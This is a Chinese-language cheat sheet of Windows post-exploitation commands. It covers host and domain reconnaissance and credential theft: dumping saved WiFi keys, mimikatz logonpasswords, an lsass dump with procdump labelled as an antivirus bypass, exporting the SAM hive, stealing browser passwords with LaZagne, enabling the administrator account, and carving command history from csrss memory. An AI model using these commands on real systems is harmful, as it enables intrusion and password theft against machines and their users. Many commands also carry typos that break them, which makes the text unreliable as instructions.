常用命令
主机名:hostname IP地址等信息:ipconfig 系统信息:systeminfo 查询补丁信息:wmic qfe list 查看环境变量:sc query
查看路由表:Route print
查看连接过的WIFE:for /f "skin=9 tokens=1,2 delims=:"%i in('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
查看arp表:arp -a 查看本地用户组: net localgroup 查询客户机会话:query session 查询历史命令:doskey/history
查看dns缓存:ipconfig/displaydns 查看计划任务:schtasks 查看网卡信息,主机名,主机名,域信息:ipconfig\all
查看连接:nestat -ano 查看当前用户:whoami 查看当前用户:netuser 查看系统信息: echo %OS% 查看权限:whoami/all
查询本机服务信息:wmic service list brief 查看环境变量:PATH
导出注册表: reg export HKLM hklm.reg reg export HKCU hkcu.reg reg export HKCR hkcr.reg reg export HKU hku.reg
reg export HKCC hkcc,reg
复制日志:copy C:\windows\System32\winevt\Logs\System.evtx copy C:\windows\System32\winevt\Logs\ security.evtx
copy C:\windows\System32\winevt\Logs\application.evtx
host文件:C:\Windows\System32\drivers\etc\hosts
中间件信息:*在启用了ISS的服务上:
%windir%\system32\inetsrv\AppCmd.exe list site --列出网站的列表
%systemroot%\system32\inetsrv\appcmd.exe list vdir --列出网站物理路径
敏感文件信息:
C:\windows\repair\sam C:\windows\System32\config\sam //储存了WINDOWS系统初次安装的密码
C:\Program Files\Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理源密码存储于此
C:\boot.ini //查看系统版本
C:\windows\repair\sam C:\windows\System32\config\sam //存储Windows系统初次安装的密码
C:\windows\php.in //php配置信息
组策略:
使用gpresult /h C:test.htm生成组策略表
启动项使用注册表查询:
reg query HKLM\Software\Micrpspft\Windows\CuerrentVersion\Run
查看防护软件
tasklist 可通过进程名称中的关键字判断 如360,anit-
virus,kaspersky
局域网内的主机:
net vier:显示当前域内的计算机列表
ipconfig/all 内网的网络环境、dns服务器IP、域名信息等
netstat -ano 可以看出本地系统开放了哪些端口
arp -a 查询本地ARP缓存中IP地址和MAC地址的对应关系
查看网络代理:
reg query
"HKEY_CURPENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
查询Windows中设置的系统代理,即internet选项中的代理信息
vpn信息
获取PPTP配置信息
Windows系统拨号的宽带连接的配置信息存储在固定位置,路径如下:
%APPDATAT%\Microsoft\Network\Connections\Pbk\rasphone'pbk
查看该文件即可获得PPTP连接的配置信息,包括服务器IP,不包括连接用户名和口令
本地用户信息
net localgroup //查看本地用户组
net user //查看本地用户
net localgroup administrators //查看哪些用户是管理员
net user administrator /avtive:y //开启用户
最近rdp连接信息
查看最近rdp连接过的主机
reg query "HEKY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server Client\Default"
抓取密码
使用mimikatz抓取本地用户的明文密码(需要管理员权限)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"exit
绕过杀软
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
下载导出的密码后使用mismkatz mimikatz.exe "sekurlsa::mindump lsass.exe lsass.dmp" "sekurlsa::logonPasswords"exit
使用windows的注册表导出密码
reg save hklm\sam .\sam.hive $ reg save hklm\system .\system.hive mimikatz'exe "lsadump : : sam /sam:Sam.hive /system:System.hive" exit
浏览器密码:
Chome中保存的密码先被二次加密,然后被保存在SQLite数据库文件中,位子如下:
%LocalAppData%\Google\Chrome\User Data\Default\Login Data
可使用USBStealer 导出浏览器历史记录以及密码或者使用https://github.com/AlessandroZ/LaZagne
laZagne.exe browsers-chrome
此工具同样支持firefox以及系统中其他密码的导出
用户回收站:
cd C:\$Recycle.bin\
使用dir/A查看隐藏文件
S-1-xxxx分别对应不同用户的回收站
域信息
nltest /dsgetdc:域名 找域控
或者使用dc列表nltest /dclist:domain-a 其中pdc是主域控
nltest /domain_trusts 可以列出域之间的信任关系
net user /domain 查看域里面的用户
net group /domain 获取域用户组信息
net group "domainadmins /domain" 查看域管理源登录时间,密码过期时间,是否有登录脚本,组分配等信息
net time /domain 可以查看域时间,以及域服务器名字
命令历史记录
windows并不像Linux保存了bash_history, windows的命令历史记录只保存在内存中可使用procdump dump出csrss.exe进程
然后用Volatility cmdscan模块提取